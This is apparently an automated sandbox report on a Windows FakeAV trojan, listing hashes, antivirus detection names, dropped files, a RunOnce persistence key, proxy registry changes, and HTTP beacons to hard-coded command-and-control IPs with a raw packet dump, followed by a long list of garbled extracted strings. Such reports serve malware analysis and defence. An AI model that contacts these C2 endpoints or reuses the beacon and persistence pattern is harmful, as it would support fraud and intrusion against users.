Analysis Date2015-08-29 07:59:31
MD5c4c24b35a4d3b5c5fa332d27f46fe2cf
SHA133a72b4d2dad75b4736a68649aa90c5209f66502

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f34375c21cc97d9e4946fa0c9ba32220 sha1: 8551c40fcd5c8aa67efa22ff408c448efe4ea72c size: 182272
Section.rdata md5: 02e582a7214ac986b632e633a75288cc sha1: 246ed5fdb450a36f1e0934a9a2bd582509f59237 size: 2048
Section.data md5: 25b1a8a6a6c8ef7abb64d9c3c0dbbebe sha1: ed1bb37025e0a667dbf3f3fc8fb740281c4086ce size: 122368
Section.rsrc md5: 87a429fc6853f9b30aa9ed892d49bb0f sha1: 9807a0fc91ce5a80459f30e02981ac93776eb698 size: 5120
Timestamp1971-02-21 17:04:37
PEhashd1757550dea3e60f14627f63cf10b19147c89880
IMPhash8aaaf4897d2db89e81da04378e9e697c
AVRisingTrojan.FakeAV!49B1
AVMcafeeGeneric FakeAlert.amb
AVAvira (antivir)TR/FakeAV.btxt.7
AVTwisterTrojan.558BEC81C4DCFAFFF.mg
AVAd-AwareGen:Heur.Cridex.2
AVAlwil (avast)MalOb-FY [Cryp]
AVEset (nod32)Win32/Kryptik.LYW
AVGrisoft (avg)FakeAlert.AAS
AVSymantecTrojan.FakeAV!gen39
AVFortinetW32/FakeAlert.AMB!tr
AVBitDefenderGen:Heur.Cridex.2
AVK7Trojan ( 001e60c61 )
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMalwareBytesTrojan.Agent
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVIkarusTrojan.Win32.FakeAV
AVEmsisoftGen:Heur.Cridex.2
AVZillya!Trojan.FakeAV.Win32.56392
AVKasperskyTrojan.Win32.FakeAV.btxt
AVTrend MicroTROJ_FAKEAV.SMID
AVCAT (quickheal)FraudTool.Security
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVPadvishMalware.Trojan.FakeAV-5428
AVBullGuardGen:Heur.Cridex.2
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVClamAVTrojan.FakeAV-5428
AVDr. WebTrojan.Inject.28897
AVF-SecureGen:Heur.Cridex.2
AVCA (E-Trust Ino)Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\33a72b4d2dad75b4736a68649aa90c5209f66502
Creates FileC:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a299B.tmp
Deletes FileC:\33a72b4d2dad75b4736a68649aa90c5209f66502
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aE615.tmp"
Creates Process"C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe" "C:\malware.exe"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hEgAhMmPoDl08200 ➝
C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe\\x00
Creates FileC:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE615.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=08200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.77/i.php?affid=08200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GEThttp://69.50.195.77/r.php?affid=08200&data=31AEA843B2D209EF2E25E669DAB068370365623929ACCB494C7074C927B430BD010410&v=1&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.77:80
Flows TCP192.168.1.1:1034 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30383230 30204854 54502f31   fid=08200 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3038 32303020 48545450 2f312e31   d=08200 HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f3639 2e35302e 3139352e 37370d0a   //69.50.195.77..
0x00000040 (00064)   41636365 70743a20 2a2f2f2a 0d0a436f   Accept: *//*..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x00000080 (00128)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000090 (00144)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000a0 (00160)   6c653b20 4d534945 20372e30 3b205769   le; MSIE 7.0; Wi
0x000000b0 (00176)   6e646f77 73204e54 20352e31 3b204754   ndows NT 5.1; GT
0x000000c0 (00192)   42302e30 3b202e4e 45542043 4c522031   B0.0; .NET CLR 1
0x000000d0 (00208)   2e312e34 33323229 0d0a486f 73743a20   .1.4322)..Host: 
0x000000e0 (00224)   36392e35 302e3139 352e3737 0d0a436f   69.50.195.77..Co
0x000000f0 (00240)   6e74656e 742d4c65 6e677468 3a203738   ntent-Length: 78
0x00000100 (00256)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000110 (00272)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d3331 41454138   e....data=31AEA8
0x00000140 (00320)   34334232 44323039 45463245 32354536   43B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373033 36353632   69DAB06837036562
0x00000160 (00352)   33393239 41434342 34393443 37303734   3929ACCB494C7074
0x00000170 (00368)   43393237 42343330 42443031 30343126   C927B430BD01041&
0x00000180 (00384)   763d31                                v=1

0x00000000 (00000)   47455420 2f722e70 68703f61 66666964   GET /r.php?affid
0x00000010 (00016)   3d303832 30302664 6174613d 33314145   =08200&data=31AE
0x00000020 (00032)   41383433 42324432 30394546 32453235   A843B2D209EF2E25
0x00000030 (00048)   45363639 44414230 36383337 30333635   E669DAB068370365
0x00000040 (00064)   36323339 32394143 43423439 34433730   623929ACCB494C70
0x00000050 (00080)   37344339 32374234 33304244 30313034   74C927B430BD0104
0x00000060 (00096)   31302676 3d312668 3d312048 5454502f   10&v=1&h=1 HTTP/
0x00000070 (00112)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000080 (00128)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000090 (00144)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x000000a0 (00160)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x000000b0 (00176)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000c0 (00192)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000d0 (00208)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000e0 (00224)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000f0 (00240)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000100 (00256)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000110 (00272)   290d0a48 6f73743a 2036392e 35302e31   )..Host: 69.50.1
0x00000120 (00288)   39352e37 370d0a43 6f6e6e65 6374696f   95.77..Connectio
0x00000130 (00304)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x00000140 (00320)   0a334232 44323039 45463245 32354536   .3B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373033 36353632   69DAB06837036562
0x00000160 (00352)   33393239 41434342 34393443 37303734   3929ACCB494C7074
0x00000170 (00368)   43393237 42343330 42443031 30343126   C927B430BD01041&
0x00000180 (00384)   763d31                                v=1


Strings
..(o
.
....
m
r
]
.u.
].
5
^...
|
.h
.
.
@
.
^
 
n
.

1001
File
Main
MS Sans Serif
01l'u(5
0[8	f	
.098rcw
%0HrU!
0Iab<f
0jbyNn
0j] mj
0m}Ovu
*<^/>0n
[^@0,y
13?yrt_
"15bp4 <B
1h643d
<1_@ha
$1HK,e
,|1J5~
1lIy_y9
1!N6K8
1XNrX 	
)1@ynrKB3~
(1}ySPT
21raO^
>29P46
2bKoZ(
&2;`ds
2end9d
([2h]&
2tHx.'
}|30Q}
%!37Z_
3Epw]Io|
3Eqfgt
:3f+Gj(I3
3J".SX;b]*=
_3=.@Sn
{3zMAGS-
/4@4CuCJ"
47nv*Q
4Awe\v
4iE)PCvNu
4k\jB!
--4/qQv
|	4rTuF\0P
<4[zne
(5}8_D
/#5f=/
5%F5Dh
5iDxiP
@5O#ot
5pvm CCB
+6lZB*
;6nd2Yq
{6Q>'\
6qFV'p
]6x+]^YM;*V`~
_73UWbZ
7.>5&.
	75}p@
79<mUt
7CLyBr~
7;eyg)
7H5]=S
}7j&G\
7TZ?DX
7yKX/$
?7ytMKd
_	[[>=8
8\+5ZR[
8>)7'<
&<8769<
87K@x\
8~88+)K
8<9~q	e
8fKzBrF4
=_~>8;k
>8&RO`
;8{wJj
8Wvk	8
8X$FUo
8ZgOm](
9]j{t*
9M[nmw
9RrX	w[
9:S)/+
=9|z" 
a3Axt"
A8WKu~H 
A^'c@S
>aC`*Z
Adof#s]
AF8s"d
*AgIw5
AGoy*j
Aj@28r
Ak@=:Y
aln_!}f
AlZZJj
A!m 	a|,2
\$<aMl
,)@ an
ANOWLJ
a}P[~W
As$b,t
Awr*'#
a WYk	w
Aytv#B77[
;bfa"<
Bf'&D6.h
:B+:G^{
B{gQtb
bhk/=py
BitBlt
<)=b>jK
b	+JYGE7
bo*7xF
]]*bP$
b;:Rvz
bt40=.A
b[vTiX
b=y=SG>
:c6qYg
|c6wv_
C8G>kO
#C\b`P
cckwSt
cD6J9PITH
CG5'c>
CharLowerA
ci||4370
CloseHandle
C\Ng3~	
.C}nu)
`cp[X9
}C.QEXgVY
CQJj,u
c;Qj@/W
CreateThread
#="|C&s
\CteM~
c@V/.qv
[CWCIX|
%cYQiS
|d0PWpH9
D8uYs{
{^D8Ws
dag4U{
@.data
d.DNf7t
DeleteCriticalSection
df0Cf7
dFWRuor
D~Kf/w
DK-t	cP)oJ
+`D'l`L
d+m>]'g
dNqm\T
_d?P\8a
dp9RzNPW
dp	K1e
?dq;SL
}d*R/U
-;Duy8
dyKkX?T
dzF69A_n
dzZouBw
\e^\^:
'E~0F_q
e.{1;G
E~2="7
~E44]/6
-e53-~^
E6{KSg
EaU#]^
eB!|ef#
]ED.[:
EevjQf
EF<0P/
EjF#Yk
<e=JqwT
enO'dTv
EnumSystemLocalesA
eRGy#?x(0
ExGJYM,N
ExitProcess
ExitThread
[eZ9/%
$[F7>"2"
faq4@4
fc)E^B
F|,DTq
ff>[ReFr
ffRO<go2
\Fg.mkdHp
fhD^lN
fIog;T
fJk~fBe
F!jLo:
?<fJyk
fka]@2
FlushFileBuffers
FlushInstructionCache
fn2~eP
>. fnh
|fNoni
fnU_Sd;J
FreeEnvironmentStringsA
FYw_& 
fZ]]e2^
@g(7<m03
g7R;dz
_<gD	)
gDAB,X
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
GetWindowLongW
gJglAsA^[=e
~gJ(yn
g*K!8q
'GKCA8z
gl?Qjh)D
Gmyj*4
</gNXs
gQncNt
gr^96Y
g.\sf#
[h3tF.
h5kU/i
H-A.{(
&Hab+R
haw[7$
]hDGi-20
HeapAlloc
HeapCreate
HeapFree
hjSyd\8
=HK^G~5
_<h}M-
*HM6W#
hn:ni%}
H"Si]$
HsZ/l9
Ht-:uf
^^%HW9I
HXk|-k
hY"a^x
hZLueDC
\	*~I]
 i0j42
@]I9`E
.+(>i%9Ep
~{ Ib|Y
=iD?|j
I[FNAr
'i.FOdVg
:,IG]Y
>iK?AQ
]ikl^^
iKu'q1
InterlockedDecrement
InterlockedExchange
-irF|W
IsValidLocale
IWP_(>
?I|X@(
!iX%P%
{<IXtR
`I;znB	
{ j~<3
 J!$3P
j4|5df
J>aY:P
j,enEd
JghN-ig
>Jl5,(cF
jlfY(uV
jm'D"&`6
~JNl?qT
+j{O;1
Jtx,bC
J+#UP*
ju'r1@"P
jx7#Gn
JZ;'OE
k;0a]i#
k0} Zdc
k]!_1x
\K1.(x
k6Rx;t
K^8p[I^G
K96r2y
|K_"CaL
KERNEL32.dll
.kfn,6
K$~&$HV	
@KM {B
=^KObLYJ
KvYnWN
kW#aY2d0
&k^YK"48
KZ;)  s
l69E?0
LCMapStringA
lc]r7)
LeaveCriticalSection
LF)HI/2
LK.90T
#LKx~F 
Ll__es=wR$
|L'n9f
LnEstJ
l^nL'a
LocalAlloc
m0tA4QV
m''2lM8gk
m5oq*}
$(m5(*:SI
m(d8y#
Md,hGl%
[>M||{h
mhV"%<)
,MKBKy
'MKie}
~ml|8t
MSIMG32.dll
m#TtlTC<5
MW?xhvV]
mz^^ZJ
?N~^:@<
n+3E}sXtr
@n9jSNR
nciJ]<
n)|dFQ;f
ng&9pdj
^`NjFqhme#
nQBnv#*>
=N}SlU3
nv.3'08F
n	wp'F%L
NYKx/VRh
OC"	21O{
oFM# [
`oFUO_F
&!oiNK
oL?K 3
+olw'm
OMfWS#
)omTW~
o~nAe$
o? $&O
Oo$qYbJk
OPJ:F"E]+
o@PjN@2
OQ_r`~%
oTAu	j~(
ot=Fxh6
~O@:u~Gz]9
'_>P1r+
p8dbxOt"
(P}\f_[
_PH+u.
pl5n} 
>%:,Pm
#{pmYYh
PnLA5'Q
	pt-Xl
P])vc't|o|
PVPv7^+)=
#pwvdu
P^X!}+&
pXM]MV
q.:(0%
]q>0#A
?Q9z\q&
QaTxsw
qbKsj5a
,qEZ;8
/Q|ipI
QL%e?}
qLP<9%
@qO'\q`-t|
'Qt.XZ
qVO_=#
Q;W- ^
}q"wJHe
qWS'yV0
Qz`!8~;
-r5	}LF
?r7Pj 
+R87QO	<
$r>BE}
R]BR4;
`.rdata
&RdEBXe`
ReH5gk 
{Rh}8U
R<=$hv
Rich$-
rjxSQ5
`R 'K2I
rNm-lb*
rQ^7NZ
RtlUnwind
RvxUf)J
{\R\W*
r@W[0^
	S&2nL
sa<}XY
SelectObject
SetAbortProc
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
/Sh5wt
sI2g3q
sKd@jo4
_sN27pI
snzJw^
sR?s	N
S/TN8oL
Su@'+0
Su~CV*
s*"W_QwK
#Swx/PD
&<")t/
T[2l]_
)t!\6C
Tarypx
:tB|L\~
TBSU6S
	T=FTf!
TG:*3G
!This program cannot be run in DOS mode.
&TH	T9
tJ6QHZ2
t]JMGah
Tq11:S5
|t-qJ{p
TransparentBlt
@tso-./
=TT+Br
tu(^s@
Tw"O/3
u2<rZX
u>#3O]w	(
Ua/I {
,UaNx^
UaZ*YV)
UB12apmV]
u}dlT~
).UEJr
u-]{?h
UH<B`o)
)U[,ir
`%U%N{bj
UQ u_(
USER32.dll
Us	o3pC
uXWBktXZw`
UyHW`\
v`@2Dr
V9@C|:5
Va6\d0
v?CTX"
:vcw]r~
Vd0')nu
VDoj~b
ven`ge
vgrZ/LL
vg}*Wc_UQ
VHk	`t4
VirtualAlloc
VirtualFree
VirtualQueryEx
vKEaWLG
&VlI7T
v>"npJ"
v.[!p2k
VRmR+(k
#vrT<#
'vytM'
waE^7j
)wBHyA
w*C@~.
wD#_'B
]W~dy-
+WE>\1FE
w.Fw2h
.&wg/E
WJx]&u
w-Lx^c
Wq.jlL
W$RCZ8
WriteConsoleA
WYn[D5
x8P;A"
x}9-lj
xA5/X'
X:Br,z
xc#Vc!
xD#J-yf
x$engXfY?
XH5kw}j
XHRHga
X('IP$
XM^j|(
X^Mw1g
?XZWiS
y08w<ndE
~Y=@1I	
*Y5(J/gk
y^AEPAK
YBe-D]O
+yGPv]H
yh~	$d
! ynyk]
(&YP|'f
Yq^7b9
yUN0jD
y@vUEJ
y"XahS
\Y|ZW+
z35K/0n
#|}=z5
z6?\.:
ZaOy'[i
ZBB9'0T_|0>
/zDrak
Z,ff.wxf
_Z)I1)
z&u|1=$
Zz\LpB2: